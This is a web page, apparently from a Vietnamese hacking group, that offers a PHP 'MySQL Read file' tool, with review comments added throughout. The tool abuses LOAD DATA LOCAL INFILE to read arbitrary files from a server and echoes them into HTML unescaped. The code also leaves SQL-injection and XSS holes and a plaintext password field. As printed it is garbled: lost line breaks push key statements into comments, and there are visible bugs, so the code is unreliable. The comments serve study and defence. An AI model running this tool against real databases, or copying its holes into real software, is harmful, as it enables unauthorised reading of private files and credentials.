HCE-MySQL Read file

MySQL Read file :


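Với một database trên một server, bạn có khả năng read mọi file (dĩ nhiên là phải được set permission cho phép đọc) với tool này. Tool dùng câu lệnh LOAD DATA LOCAL INFILE, nên file được đọc với quyền của tiến trình PHP chạy tool và chỉ đọc được khi local_infile đang bật; tắt local_infile trên MySQL server là cách chặn kiểu đọc file này: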

<!-- Review note: input form of the file-read tool. It posts five text fields
     (server, username, password, database, file) and the submit button "read"
     back to the same script, which handles them in the PHP section below. -->
<head>
<title>
COPYRIGHT BY WINDAK
</title>
</head>

<body bgcolor="#008080">

<p align="center">

<i><b>Copyright by Windak</b></i></p>

 <!-- Build the form that collects the query parameters -->

 <!-- The form action echoes PHP_SELF from the legacy $HTTP_SERVER_VARS array, unescaped. -->
 <form action=<? echo $HTTP_SERVER_VARS['PHP_SELF'] ?> method=post>

<table align="center" border=3 cellpadding="3" cellspacing="2" bordercolor="#ffffff" width="420" height="321"> <tr> <td bgcolor="#00FFFF" width="72" height="22">

<b>Server</b> </td>

<td width="329" height="22">

<!-- Each value attribute below echoes a bare variable ($server, $username, ...)
     that the visible code never assigns from the request; presumably the page
     relies on register_globals (to be confirmed). The values are written into
     the HTML without escaping. -->
<input name=server value="<? echo $server ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">

</td></tr> <tr> <td bgcolor="#00FFFF" width="72" height="22"><b>Username</b> </td>

<td width="329" height="22">

<input name=username value="<? echo $username ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">

</td></tr>

<tr> <td bgcolor="#00FFFF" width="72" height="22">

<b>Password</b> </td>

<td width="329" height="22">

<!-- No type attribute: the database password is a plain text input and is echoed back in clear. -->
<input name=password value="<? echo $password ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">

</td></tr>

<tr> <td bgcolor="#00FFFF" width="72" height="22">

<b>Database</b> </td>

<td width="329" height="22">

<input name=database value="<? echo $database ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">

</td></tr>

<tr> <td bgcolor="#00FFFF" width="72" height="22">

<b>Read File</b></td>

<td width="329" height="22">

<!-- Path of the file to read; the handler places it inside the LOAD DATA LOCAL INFILE statement. -->
<input name=file value="<? echo $file ?>" size=30 style="HEIGHT: 22px; WIDTH: 321px">

</td></tr>

<tr> <td bgcolor="#00FFFF" width="401" colspan="2" height="26">

<p align="center">

<!-- The handler checks for this field name ("read") in $HTTP_POST_VARS before doing anything. -->
<input type="submit" name=read value="Okie Read">

</td> </tr> </table></form>

<!-- Build the command -->

<? //Initialise $self=$HTTP_SERVER_VARS['PHP_SELF']; $foo="exploit";
// NOTE(review): the page lost its line breaks, so as printed the assignments on
// the line above are part of the // comment. $foo is presumably meant to hold
// the scratch table name "exploit" used by every statement below.

 // Act only when the form's "read" submit button was posted.
 if (isset($HTTP_POST_VARS['read']))

// Connects with the posted server and credentials through the legacy mysql_*
// extension (same caveat: as printed, the call sits inside the // comment).
{ //Set up the query $conn = mysql_connect("$server","$username","$password");

mysql_select_db($database);

// Intended as the connection check (written `!conn`, without `$`, and placed
// after mysql_select_db): prints mysql_error() and exits.
if (!conn) { echo mysql_error();

 exit;

// Second test of the same "read" field.
} if (isset($HTTP_POST_VARS['read']))

// Creates a scratch table named by $foo with a single LONGBLOB column of the
// same name. On failure: print the error, attempt DROP TABLE, exit.
{ if (!mysql_query("create table $foo( $foo LONGBLOB NOT NULL) "))

{ echo mysql_error();

 mysql_query("DROP TABLE $foo"); exit;

// Core statement. With LOCAL, the MySQL client side (this PHP process) reads
// the file named by $file and sends it to the server, so the read is bounded by
// the file permissions of the account running PHP. $file is interpolated into
// the SQL text unescaped. The marker '__THIS_NEVER_HAPPENS__' is used as both
// field and line terminator, presumably so the whole file lands in one row.
// Defender notes: the statement is refused when local_infile is disabled; the
// marker string and the create/load/drop sequence on a LONGBLOB table would
// show up in a general query log if one is enabled.
} if (!mysql_query("LOAD DATA LOCAL INFILE '$file' INTO TABLE $foo FIELDS TERMINATED BY '__THIS_NEVER_HAPPENS__' ESCAPED BY '' LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"))

 { echo mysql_error(); mysql_query("DROP TABLE $foo");

exit; }

 // Query that reads the loaded rows back out of the scratch table.
 $query = "Select * from $foo"; }

 //Run $res=mysql_query($query);

// Prints the MySQL error when $res is falsy; execution continues afterwards.
if (!$res){ echo mysql_error();

} echo "

<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" \"border-collapse: collapse\" bordercolor=\"#111111\" width=\"100%\" id=\"AutoNumber1\">" ;

// Header row: one cell per result column, named from mysql_fetch_field().
// $i is not initialised in the visible code before this loop.
echo "<tr>"; $ncols = mysql_num_fields($res);

while($i<$ncols)

{ $meta = mysql_fetch_field ($res);

echo "<td> <b>". $meta->name ."

</b> </td>" ; $i++;

// Data rows: every column value is echoed into a table cell without HTML
// escaping, so the loaded file content is emitted as raw markup.
} echo "</tr>"; while($data=mysql_fetch_array($res))

{ echo("<tr>"); for($i=0; $i<$ncols; $i++)

{ echo "<td> ". $data[$i] ." </td>";

} echo("</tr>");

// Clean-up: empties and drops the scratch table, then frees the result set.
} mysql_query("DELETE FROM $foo");

mysql_query("DROP TABLE $foo");

mysql_free_result($res);

} ?>

</table></body> </html>